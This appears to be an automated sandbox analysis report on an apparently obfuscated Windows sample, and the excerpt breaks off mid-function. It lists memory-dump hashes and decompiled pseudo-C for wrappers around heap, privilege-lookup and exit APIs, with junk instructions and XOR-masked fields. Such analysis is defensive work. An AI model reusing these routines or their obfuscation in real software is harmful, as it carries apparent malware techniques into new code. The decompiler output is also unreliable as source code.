                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: b0db4e99121070ee69e830765904451bf2c1ec762a52895565c51028c1c83436
                  • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                  • Opcode Fuzzy Hash: b0db4e99121070ee69e830765904451bf2c1ec762a52895565c51028c1c83436
                  • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, Offset: 1EAA0000, based on PE: true
                  • Associated: 0000000F.00000002.790535754.000000001EBBB000.00000040.00000001.sdmp
                  • Associated: 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 7152312ff493efd1f3463ca422fb83251d8b9a2f466d0d84ca4a2cf1321075c2
                  • Instruction ID: fbffd392c3054295de286f870ed741930e985d333f35e773befb0cbc1d95f591
                  • Opcode Fuzzy Hash: 7152312ff493efd1f3463ca422fb83251d8b9a2f466d0d84ca4a2cf1321075c2
                  • Instruction Fuzzy Hash: 6C90027160109802D110725A940474E080557D0752F95C925E4414A18D86D588A17161
                  Uniqueness

                  Uniqueness Score: -1.00%


                  C-Code - Quality: 72%
                  			E004088C0(void* __ecx, void* __eflags, intOrPtr _a4) {
                  				intOrPtr _v8;
                  				char _v24;
                  				char _v284;
                  				char _v804;
                  				char _v840;
                  				void* __ebp;
                  				void* _t24;
                  				void* _t31;
                  				void* _t33;
                  				void* _t34;
                  				void* _t39;
                  				void* _t50;
                  				intOrPtr _t52;
                  				void* _t53;
                  				void* _t54;
                  				void* _t55;
                  				void* _t56;
                  
                  				_t52 = _a4;
                  				_push( &_v24);
                  				_push(_t52);
                  				_t39 = 0; // executed
                  				_t24 = L00406E20( &_v24, __ecx); // executed
                  				_t54 = _t53 + 8;
                  				if(_t24 != 0) {
                  					_push( &_v840);
                  					_push( &_v24);
                  					L00407030(_t24,  &_v840);
                  					_t55 = _t54 + 8;
                  					do {
                  						E0041A0E0( &_v284, 0x104);
                  						_t42 =  &_v804;
                  						E0041A750( &_v284,  &_v804);
                  						_t56 = _t55 + 0x10;
                  						_t50 = 0x4f;
                  						while(1) {
                  							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
                  							_t56 = _t56 + 0x10;
                  							if(_t31 != 0) {
                  								break;
                  							}
                  							_t50 = _t50 + 1;
                  							if(_t50 <= 0x62) {
                  								continue;
                  							} else {
                  							}
                  							goto L8;
                  						}
                  						_t42 =  *(_t52 + 0x14);
                  						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *(_t52 + 0x14);
                  						_t39 = 1;
                  						L8:
                  						_push( &_v840);
                  						_push( &_v24);
                  						_t33 = L00407060( &_v24, _t42);
                  						_t55 = _t56 + 8;
                  					} while (_t33 != 0 && _t39 == 0);
                  					_push( &_v24);
                  					_push(_t52); // executed
                  					_t34 = L004070E0(_t33,  &_v24); // executed
                  					if(_t39 == 0) {
                  						asm("rdtsc");
                  						asm("rdtsc");
                  						_v8 = _t34 - 0 + _t34;
                  						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                  					}
                  					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                  					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *((intOrPtr*)(_t52 + 0x31)) + 1;
                  					return 1;
                  				} else {
                  					return _t24;
                  				}
                  			}





















                  Memory Dump Source
                  • Source File: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 23857c0378d08e713b0962bd06797abda6866aa9709ff00829a1edd27974e17f
                  • Instruction ID: 45e1b5456bc83a9244d52dfc8b0508b5930111f9c3f75bdf3035c43f7544f730
                  • Opcode Fuzzy Hash: 23857c0378d08e713b0962bd06797abda6866aa9709ff00829a1edd27974e17f
                  • Instruction Fuzzy Hash: C8212BB2D442085BCB11E6609D42BFF736C9B14304F04017FE989A2181FA38AB498BA7
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E0040815D(void* __eflags, intOrPtr _a8, intOrPtr _a12) {
                  				struct _EXCEPTION_RECORD _v0;
                  				char _v8;
                  				intOrPtr _v12;
                  				char _v75;
                  				char _v76;
                  				short _v552;
                  				struct _CONTEXT _v584;
                  				char _v586;
                  				short _v588;
                  				signed int _t29;
                  				struct _EXCEPTION_RECORD _t50;
                  				void* _t56;
                  				void* _t58;
                  				void* _t63;
                  
                  				_t63 = __eflags;
                  				asm("lodsd");
                  				asm("lodsb");
                  				_push(0x81ec8b55);
                  				_v588 = 0;
                  				E0041A130( &_v586, 0, 0x1fe);
                  				_v12 = 0x2d;
                  				_v76 = 0;
                  				E0041A130( &_v75, 0, 0x3f);
                  				E0041AD10( &_v76, 9);
                  				_t50 = _v0;
                  				_t29 = E00409B30(_t63, _t50 + 0x1c,  &_v76); // executed
                  				_t58 = _t56 - 0x244 + 0x28;
                  				 *(_t50 + 0xa18) = _t29;
                  				if(_t29 != 0) {
                  					 *(_t50 + 0xa18) =  *(_t50 + 4) ^ _t29;
                  					KiUserExceptionDispatcher(_t50,  &_v584); // executed
                  					_t58 = _t58 + 8;
                  				}
                  				_v552 = 0;
                  				E0041A510( &_v584,  &_v8, 0);
                  				if(_a8 != 0) {
                  					_t52 = _a12;
                  					if(_a12 != 0 && E0041A3A0( &_v584) <= 0x3a) {
                  						E0041A0B0(_t52,  &_v584, E0041A3A0( &_v584) + _t34 + 2);
                  					}
                  				}
                  				return 0;
                  			}


















                  APIs
                  • KiUserExceptionDispatcher.NTDLL(?,?), ref: 004081D8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp
                  Similarity
                  • API ID: DispatcherExceptionUser
                  • String ID: -
                  • API String ID: 6842923-2547889144
                  • Opcode ID: afd4b19865c9fc643c3e31ceee8fdca55ba90edee12116da5951f7266cf29b26
                  • Instruction ID: 7584bd8e00ecca98f57e71c5fea23c7c3bd2e675ef16cffa29b182ba117fe362
                  • Opcode Fuzzy Hash: afd4b19865c9fc643c3e31ceee8fdca55ba90edee12116da5951f7266cf29b26
                  • Instruction Fuzzy Hash: 97210772C112086AD724EBA0DE45BDF73B8DF04304F04459FA40967142FB74AB49CB96
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00408160(void* __eflags, struct _EXCEPTION_RECORD _a4, intOrPtr _a8, intOrPtr _a12) {
                  				char _v8;
                  				char _v71;
                  				char _v72;
                  				short _v552;
                  				char _v582;
                  				struct _CONTEXT _v584;
                  				signed int _t29;
                  				struct _EXCEPTION_RECORD _t49;
                  				void* _t51;
                  				void* _t52;
                  				void* _t56;
                  
                  				_t56 = __eflags;
                  				_v584 = 0;
                  				E0041A130( &_v582, 0, 0x1fe);
                  				_v8 = 0x2d;
                  				_v72 = 0;
                  				E0041A130( &_v71, 0, 0x3f);
                  				E0041AD10( &_v72, 9);
                  				_t49 = _a4;
                  				_t29 = E00409B30(_t56, _t49 + 0x1c,  &_v72); // executed
                  				_t52 = _t51 + 0x28;
                  				 *(_t49 + 0xa18) = _t29;
                  				if(_t29 != 0) {
                  					 *(_t49 + 0xa18) =  *(_t49 + 4) ^ _t29;
                  					KiUserExceptionDispatcher(_t49,  &_v584); // executed
                  					_t52 = _t52 + 8;
                  				}
                  				_v552 = 0;
                  				E0041A510( &_v584,  &_v8, 0);
                  				if(_a8 != 0) {
                  					_t50 = _a12;
                  					if(_a12 != 0 && E0041A3A0( &_v584) <= 0x3a) {
                  						E0041A0B0(_t50,  &_v584, E0041A3A0( &_v584) + _t34 + 2);
                  					}
                  				}
                  				return 0;
                  			}

                  APIs
                  • KiUserExceptionDispatcher.NTDLL(?,?), ref: 004081D8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp
                  Similarity
                  • API ID: DispatcherExceptionUser
                  • String ID: -
                  • API String ID: 6842923-2547889144
                  • Opcode ID: 4962e014442806759a33c5c39919b5773fef745807da4126db40f74e2b1b434a
                  • Instruction ID: dce7b4654e51871546c5ecb8a57178bb7fb86ae0d121bdcd9637ce89e876311e
                  • Opcode Fuzzy Hash: 4962e014442806759a33c5c39919b5773fef745807da4126db40f74e2b1b434a
                  • Instruction Fuzzy Hash: ED21A472C11218AADB24FBA0DE45FDF73B8DF04314F00459EA909A7181FA78AB448B96
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E004188D2(void* __edi, void* _a4, long _a8, void* _a12) {
                  				intOrPtr _v0;
                  				char _t10;
                  
                  				asm("loop 0xffffffbb");
                  				asm("stosd");
                  				asm("loop 0xffffffcd");
                  				asm("adc esi, [esi]");
                  				asm("a16 cli");
                  				asm("std");
                  				_push(_t19);
                  				_t7 = _v0;
                  				_t3 = _t7 + 0xc74; // 0xc74
                  				E004191D0(__edi, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                  				_t10 = RtlFreeHeap(_a4, _a8, _a12); // executed
                  				return _t10;
                  			}

                  APIs
                  • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: AllocateHeap
                  • String ID: &5A
                  • API String ID: 1279760036-1617645808
                  • Opcode ID: fba5486c192a39c11077e04983a5713cb07e051a0afd4ee3861ad0ccf9b28661
                  • Instruction ID: f0c2f0e04a0ea6fd07091886418cea278941dcfa5cf81bd0d75be5f2a663c3dd
                  • Opcode Fuzzy Hash: fba5486c192a39c11077e04983a5713cb07e051a0afd4ee3861ad0ccf9b28661
                  • Instruction Fuzzy Hash: 5FF027B64082446FEB04FA78AC868D777989EC03187254A5EF84853203D235D45986F5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                  				void* _t10;
                  				void* _t15;
                  
                  				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34); // executed
                  				_t6 =  &_a8; // 0x413526
                  				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                  				return _t10;
                  			}

                  APIs
                  • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: AllocateHeap
                  • String ID: &5A
                  • API String ID: 1279760036-1617645808
                  • Opcode ID: 518a694957189e9484c3970cdafd744962311bef32feec336ddc3a5ec246254a
                  • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                  • Opcode Fuzzy Hash: 518a694957189e9484c3970cdafd744962311bef32feec336ddc3a5ec246254a
                  • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00408AA0(intOrPtr __eax, signed int __ecx, signed int __edx, void* __eflags, struct _EXCEPTION_RECORD _a4) {
                  				void* __ebp;
                  				intOrPtr _t15;
                  				intOrPtr _t16;
                  				signed int _t17;
                  				signed int _t21;
                  				void* _t23;
                  				void* _t27;
                  				signed int _t30;
                  				struct _EXCEPTION_RECORD _t32;
                  
                  				_t30 = __edx;
                  				_t29 = __ecx;
                  				_t15 = __eax;
                  				_t32 = _a4;
                  				 *_t32 = 0xffffffff; // executed
                  				KiUserExceptionDispatcher(_t32, ??); // executed
                  				_push(_t32);
                  				 *((intOrPtr*)(_t32 + 0x10)) = _t15;
                  				_t16 = L00416CF0(_t15);
                  				 *((intOrPtr*)(_t32 + 8)) = _t16;
                  				if(_t16 != 0) {
                  					_t17 = E00408600(_t16, _t29);
                  					__eflags = _t17 - 0x300;
                  					 *((char*)(_t32 + 0x34)) = _t17 & 0xffffff00 | _t17 - 0x00000300 > 0x00000000;
                  					__eflags = E004198E0(E00413D80(_t32, 0x73));
                  					if(__eflags != 0) {
                  						_t29 =  *(_t32 + 4);
                  						_t8 = _t32 + 0x4ac;
                  						 *_t8 =  *(_t32 + 0x4ac) ^  *(_t32 + 4);
                  						__eflags =  *_t8;
                  						 *((char*)(_t32 + 0x33)) = 1;
                  					}
                  					_t21 = E00419520(_t29, __eflags, _t32); // executed
                  					 *(_t32 + 0xc) = _t21;
                  					__eflags = _t21;
                  					if(_t21 == 0) {
                  						goto L1;
                  					} else {
                  						_t23 = E00408600(_t21, _t29);
                  						__eflags = _t23 - 0x300;
                  						_t13 = _t23 - 0x300 > 0;
                  						__eflags = _t13;
                  						 *((char*)(_t32 + 0x35)) = _t30 & 0xffffff00 | _t13;
                  						E004088C0(_t29, __eflags, _t32); // executed
                  						E00408250(_t29, __eflags, _t32);
                  						E004084B0(_t32);
                  						_t27 = E00408320(__eflags, _t32);
                  						_push(_t32);
                  						return L00406CF0(_t27, _t29);
                  					}
                  				} else {
                  					L1:
                  					return 0;
                  				}
                  			}

                  APIs
                  • KiUserExceptionDispatcher.NTDLL(?), ref: 00408AAE
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp
                  Similarity
                  • API ID: DispatcherExceptionUser
                  • String ID:
                  • API String ID: 6842923-0
                  • Opcode ID: 6a27115d0da0be0d8c15840ffc311b0517aa68a53367f9fe1c7bb206d975661b
                  • Instruction ID: 418701799975ee8251baef5e6432e5436d79c71011b7002687027b2a28f4b449
                  • Opcode Fuzzy Hash: 6a27115d0da0be0d8c15840ffc311b0517aa68a53367f9fe1c7bb206d975661b
                  • Instruction Fuzzy Hash: B6010871506B1125C6113B766D426CB36CC5F12318B04483FF4D5B2683EE7DE2448AAE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00418A31(signed int __eax, void* __ebx, signed int* __edx, void* __edi, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
                  				intOrPtr _v0;
                  				int _t11;
                  
                  				asm("into");
                  				 *__edx =  *__edx ^ __eax;
                  				0xb8a9a016(__edi);
                  				asm("lahf");
                  				_t8 = _v0;
                  				E004191D0(__edi, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t8 + 0xa18)), 0, 0x46);
                  				_t11 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
                  				return _t11;
                  			}

                  APIs
                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00418A70
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: LookupPrivilegeValue
                  • String ID:
                  • API String ID: 3899507212-0
                  • Opcode ID: 7a8675bf2638d37e74b0262aa7bdb59dcf8a51ff62f6762a7c6d1bd95ccfcd0e
                  • Instruction ID: 297ad59f8ec62c0f498e25c079dde4ef7eaf314fb1e867fffb1ae641d5c2135b
                  • Opcode Fuzzy Hash: 7a8675bf2638d37e74b0262aa7bdb59dcf8a51ff62f6762a7c6d1bd95ccfcd0e
                  • Instruction Fuzzy Hash: 6CF08C71200305BBDB10DF59CC85ED737ACAF85620F008295F9185B282C934E840C7B5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                  				int _t10;
                  				void* _t15;
                  
                  				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                  				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                  				return _t10;
                  			}

                  APIs
                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00418A70
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: LookupPrivilegeValue
                  • String ID:
                  • API String ID: 3899507212-0
                  • Opcode ID: 8b359fb7507d5b824c1c203ac476de7c77d35462f8687a4d82fa2e26643e9df4
                  • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                  • Opcode Fuzzy Hash: 8b359fb7507d5b824c1c203ac476de7c77d35462f8687a4d82fa2e26643e9df4
                  • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                  				char _t10;
                  				void* _t15;
                  
                  				_t3 = _a4 + 0xc74; // 0xc74
                  				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                  				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                  				return _t10;
                  			}

                  APIs
                  • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000), ref: 0041890D
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: 5f07ff77701c50d985bdb956e7219805ab9d32c115d1313d9b1efbd7c13c1fb9
                  • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                  • Opcode Fuzzy Hash: 5f07ff77701c50d985bdb956e7219805ab9d32c115d1313d9b1efbd7c13c1fb9
                  • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E00408A96(signed int __eax, signed int __ecx, signed int __edx, void* __edi) {
                  				struct _EXCEPTION_RECORD _v0;
                  				signed int _v117;
                  				signed int _t19;
                  				intOrPtr _t20;
                  				signed int _t21;
                  				signed int _t25;
                  				void* _t27;
                  				void* _t31;
                  				signed int _t34;
                  				CONTEXT* _t37;
                  				struct _EXCEPTION_RECORD _t38;
                  
                  				_t34 = __edx;
                  				_t33 = __ecx;
                  				_t19 = __eax ^  *(__edx - 0x4e1eaaad);
                  				asm("salc");
                  				asm("int1");
                  				_v117 = _v117 | __edx;
                  				_t38 = _v0;
                  				 *_t38 = 0xffffffff; // executed
                  				KiUserExceptionDispatcher(_t38, _t37); // executed
                  				_push(_t38);
                  				 *(_t38 + 0x10) = _t19;
                  				_t20 = L00416CF0(_t19);
                  				 *((intOrPtr*)(_t38 + 8)) = _t20;
                  				if(_t20 != 0) {
                  					_t21 = E00408600(_t20, _t33);
                  					__eflags = _t21 - 0x300;
                  					 *((char*)(_t38 + 0x34)) = _t21 & 0xffffff00 | _t21 - 0x00000300 > 0x00000000;
                  					__eflags = E004198E0(E00413D80(_t38, 0x73));
                  					if(__eflags != 0) {
                  						_t33 =  *(_t38 + 4);
                  						_t11 = _t38 + 0x4ac;
                  						 *_t11 =  *(_t38 + 0x4ac) ^  *(_t38 + 4);
                  						__eflags =  *_t11;
                  						 *((char*)(_t38 + 0x33)) = 1;
                  					}
                  					_t25 = E00419520(_t33, __eflags, _t38); // executed
                  					 *(_t38 + 0xc) = _t25;
                  					__eflags = _t25;
                  					if(_t25 == 0) {
                  						goto L2;
                  					} else {
                  						_t27 = E00408600(_t25, _t33);
                  						__eflags = _t27 - 0x300;
                  						_t16 = _t27 - 0x300 > 0;
                  						__eflags = _t16;
                  						 *((char*)(_t38 + 0x35)) = _t34 & 0xffffff00 | _t16;
                  						E004088C0(_t33, __eflags, _t38); // executed
                  						E00408250(_t33, __eflags, _t38);
                  						E004084B0(_t38);
                  						_t31 = E00408320(__eflags, _t38);
                  						_push(_t38);
                  						return L00406CF0(_t31, _t33);
                  					}
                  				} else {
                  					L2:
                  					return 0;
                  				}
                  			}

                  APIs
                  • KiUserExceptionDispatcher.NTDLL(?), ref: 00408AAE
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp
                  Similarity
                  • API ID: DispatcherExceptionUser
                  • String ID:
                  • API String ID: 6842923-0
                  • Opcode ID: 75ae0f2ac25b72965644cf07eb60bee5b12e84ed728a14ed666c10a149d2628a
                  • Instruction ID: 4b09065fceea4b0150d9e2cd383749edb1adf611988ffd2895b5ae369b2cbf8b
                  • Opcode Fuzzy Hash: 75ae0f2ac25b72965644cf07eb60bee5b12e84ed728a14ed666c10a149d2628a
                  • Instruction Fuzzy Hash: 38E086314517125ACB105FB9D8018D77FE85E46324304076FE4A5D7541D770D0818B90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00418920(intOrPtr _a4, int _a8) {
                  				void* _t10;
                  
                  				_t5 = _a4;
                  				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                  				ExitProcess(_a8);
                  			}

                  APIs
                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786790882.0000000000418000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000F.00000002.786765091.0000000000400000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786772739.0000000000408000.00000040.00020000.sdmp
                  • Associated: 0000000F.00000002.786783027.0000000000413000.00000040.00020000.sdmp
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: 16d690d00366790f64957aa77ce23f9f6d13ce44f8906329508bc41397d703fa
                  • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                  • Opcode Fuzzy Hash: 16d690d00366790f64957aa77ce23f9f6d13ce44f8906329508bc41397d703fa
                  • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 0000000F.00000002.786804689.0000000000527000.00000040.00020000.sdmp, Offset: 00527000, based on PE: false
                  Similarity
                  • API ID: Sleep
                  • String ID:
                  • API String ID: 3472027048-0
                  • Opcode ID: dca0c8da3c8f7be754a844098ed6d735b79edfb88e1888c49a9aa1b7d6db7fb4
                  • Instruction ID: f7e113cbb7bf640c974e575db7c87cdbcd6d42c567f26a6d73ca4760dac92912
                  • Opcode Fuzzy Hash: dca0c8da3c8f7be754a844098ed6d735b79edfb88e1888c49a9aa1b7d6db7fb4
                  • Instruction Fuzzy Hash: 7EE0DF302087298FD700EF20D49CFC67B91BF4B7A2F1A8285DF540B0E293208544CA20
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 44%
                  			E1EAF8E00(void* __ecx) {
                  				signed int _v8;
                  				char _v12;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				intOrPtr* _t32;
                  				intOrPtr _t35;
                  				intOrPtr _t43;
                  				void* _t46;
                  				intOrPtr _t47;
                  				void* _t48;
                  				signed int _t49;
                  				void* _t50;
                  				intOrPtr* _t51;
                  				signed int _t52;
                  				void* _t53;
                  				intOrPtr _t55;
                  
                  				_v8 =  *0x1ebbd360 ^ _t52;
                  				_t49 = 0;
                  				_t48 = __ecx;
                  				_t55 =  *0x1ebb8464; // 0x74e10110
                  				if(_t55 == 0) {
                  					L9:
                  					if( !_t49 >= 0) {
                  						if(( *0x1ebb5780 & 0x00000003) != 0) {
                  							E1EB45510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                  						}
                  						if(( *0x1ebb5780 & 0x00000010) != 0) {
                  							asm("int3");
                  						}
                  					}
                  					return E1EB0B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                  				}
                  				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                  				_t43 =  *0x1ebb7984; // 0x692c30
                  				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                  					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                  					if(_t48 == _t43) {
                  						_t50 = 0x5c;
                  						if( *_t32 == _t50) {
                  							_t46 = 0x3f;
                  							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                  								_t32 = _t32 + 8;
                  							}
                  						}
                  					}
                  					_t51 =  *0x1ebb8464; // 0x74e10110
                  					 *0x1ebbb1e0(_t47, _t32,  &_v12);
                  					_t49 =  *_t51();
                  					if(_t49 >= 0) {
                  						L8:
                  						_t35 = _v12;
                  						if(_t35 != 0) {
                  							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                  								E1EAF9B10( *((intOrPtr*)(_t48 + 0x48)));
                  								_t35 = _v12;
                  							}
                  							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                  						}
                  						goto L9;
                  					}
                  					if(_t49 != 0xc000008a) {
                  						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                  							if(_t49 != 0xc00000bb) {
                  								goto L8;
                  							}
                  						}
                  					}
                  					if(( *0x1ebb5780 & 0x00000005) != 0) {
                  						_push(_t49);
                  						E1EB45510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                  						_t53 = _t53 + 0x1c;
                  					}
                  					_t49 = 0;
